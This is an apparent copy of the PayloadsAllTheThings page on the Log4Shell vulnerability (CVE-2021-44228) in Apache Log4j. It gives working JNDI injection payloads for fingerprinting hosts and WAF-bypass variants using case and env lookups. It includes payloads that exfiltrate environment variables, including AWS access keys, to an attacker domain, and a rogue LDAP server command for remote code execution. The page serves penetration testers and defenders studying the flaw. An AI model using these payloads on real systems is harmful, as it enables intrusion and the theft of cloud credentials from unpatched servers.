log4shell.md (5105B)
1 --- 2 title: "CVE-2021-44228 Log4Shell" 3 topic: "CVE Exploits" 4 topicSlug: "cve-exploits" 5 sourcePath: "CVE Exploits/Log4Shell.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/CVE%20Exploits/Log4Shell.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # CVE-2021-44228 Log4Shell 12 13 > Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled 14 15 ## Summary 16 17 * [Vulnerable code](#vulnerable-code) 18 * [Payloads](#payloads) 19 * [Scanning](#scanning) 20 * [WAF Bypass](#waf-bypass) 21 * [Exploitation](#exploitation) 22 * [Environment variables exfiltration](#environment-variables-exfiltration) 23 * [Remote Command Execution](#remote-command-execution) 24 * [References](#references) 25 26 ## Vulnerable code 27 28 You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn]( 29 https://github.com/leonjza/log4jpwn) 30 31 ```java 32 public String index(@RequestHeader("X-Api-Version") String apiVersion) { 33 logger.info("Received a request for API version " + apiVersion); 34 return "Hello, world!"; 35 } 36 ``` 37 38 ## Payloads 39 40 ```bash 41 # Identify Java version and hostname 42 ${jndi:ldap://${java:version}.domain/a} 43 ${jndi:ldap://${env:JAVA_VERSION}.domain/a} 44 ${jndi:ldap://${sys:java.version}.domain/a} 45 ${jndi:ldap://${sys:java.vendor}.domain/a} 46 ${jndi:ldap://${hostName}.domain/a} 47 ${jndi:dns://${hostName}.domain} 48 49 # More enumerations keywords and variables 50 java:os 51 docker:containerId 52 web:rootDir 53 bundle:config:db.password 54 ``` 55 56 ## Scanning 57 58 * [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility 59 60 ```powershell 61 usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] 62 [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] 63 python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test 64 python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass 65 ``` 66 67 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) 68 69 ## WAF Bypass 70 71 ```powershell 72 ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a} 73 74 # using lower and upper 75 ${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc} 76 ${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc} 77 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} 78 79 # using env to create the letter 80 ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a} 81 ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a} 82 ``` 83 84 ## Exploitation 85 86 ### Environment variables exfiltration 87 88 ```powershell 89 ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/ 90 91 # AWS Access Key 92 ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} 93 ``` 94 95 ### Remote Command Execution 96 97 * [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server 98 99 ```ps1 100 java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10" 101 Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference 102 Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference 103 Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat 104 Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy 105 Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1 106 Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 107 Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2 108 Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 109 ``` 110 111 * [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit 112 113 ## References 114 115 * [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/) 116 * [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) 117 * [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)